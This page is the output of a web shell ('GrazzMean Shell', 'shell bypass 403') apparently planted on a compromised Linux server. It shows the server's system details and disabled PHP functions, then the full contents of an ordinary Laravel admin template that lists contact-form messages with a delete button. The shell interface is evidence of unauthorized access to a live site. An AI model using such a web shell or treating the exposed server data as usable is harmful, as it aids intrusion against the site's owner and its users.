shell bypass 403

GrazzMean Shell

Uname: Linux peekpos.com 6.8.0-1060-aws #63~22.04.1-Ubuntu SMP Tue Jun 30 02:32:53 UTC 2026 x86_64
Software: Apache
PHP version: 8.3.25 [ PHP INFO ] PHP os: Linux
Server Ip: 47.130.192.226
Your Ip: 10.1.31.86
User: www (1001) | Group: www (1001)
Safe Mode: OFF
Disable Function:
passthru,putenv,chroot,chgrp,chown,shell_exec,popen,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

name : contact.blade.php
@extends('admin.theme.default')
@section('content')
    @include('admin.breadcrumb')
    <div class="container-fluid">
        <div class="row">
            <div class="col-12">
                <div class="card border-0 box-shadow">
                    <div class="card-body">
                        <div class="table-responsive" id="table-display">
                            <table class="table table-striped table-bordered zero-configuration">
                                <thead>
                                    <tr>
                                        <th>#</th>
                                        <th>{{ trans('labels.name') }}</th>
                                        <th>{{ trans('labels.email') }}</th>
                                        <th>{{ trans('labels.message') }}</th>
                                        <th>{{ trans('labels.created_date') }}</th>
                                        <th>{{ trans('labels.updated_date') }}</th>
                                        <th>{{ trans('labels.action') }}</th>
                                    </tr>
                                </thead>
                                <tbody>
                                    @php $i=1; @endphp
                                    @foreach ($getcontact as $contact)
                                        <tr>
                                            <td>@php echo $i++; @endphp</td>
                                            <td>{{ $contact->firstname }} {{ $contact->lastname }}</td>
                                            <td>{{ $contact->email }}</td>
                                            <td>{{ $contact->message }}</td>
                                            <td>{{ helper::date_format($contact->created_at) }}<br>
                                                {{ helper::date_time_format($contact->created_at) }}

                                            </td>
                                            <td>{{ helper::date_format($contact->updated_at) }}<br>
                                                {{ helper::date_time_format($contact->updated_at) }}
                                            </td>
                                            <td>
                                                <a tooltip="{{ trans('labels.delete') }}"
                                                    class="btn btn-sm btn-danger square {{ Auth::user()->type == 4 ? (helper::check_access('role_inquiries', Auth::user()->role_id, 'delete') == 1 ? '' : 'd-none') : '' }}"
                                                    @if (env('Environment') == 'sendbox') onclick="myFunction()" @else onclick="DeleteData('{{ $contact->id }}','{{ URL::to('admin/contact/destroy') }}')" @endif><i
                                                        class="fa fa-trash"></i></a>
                                            </td>
                                        </tr>
                                    @endforeach
                                </tbody>
                            </table>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
@endsection
@section('script')
    <script>
        function DeleteData(id, deleteurl) {
            "use strict";
            swalWithBootstrapButtons.fire({
                icon: 'warning',
                title: are_you_sure,
                showCancelButton: true,
                allowOutsideClick: false,
                allowEscapeKey: false,
                confirmButtonText: yes,
                cancelButtonText: no,
                reverseButtons: true,
                showLoaderOnConfirm: true,
                preConfirm: function() {
                    return new Promise(function(resolve, reject) {
                        $.ajax({
                            headers: {
                                'X-CSRF-TOKEN': $('meta[name="csrf-token"]').attr('content')
                            },
                            url: deleteurl,
                            data: {
                                id: id
                            },
                            method: 'POST',
                            success: function(response) {
                                if (response == 1) {
                                    location.reload();
                                } else {
                                    swal_cancelled()
                                }
                            },
                            error: function(e) {
                                swal_cancelled()
                            }
                        });
                    });
                },
            }).then((result) => {
                if (!result.isConfirmed) {
                    result.dismiss === Swal.DismissReason.cancel
                }
            })
        }
    </script>
@endsection
© 2026 GrazzMean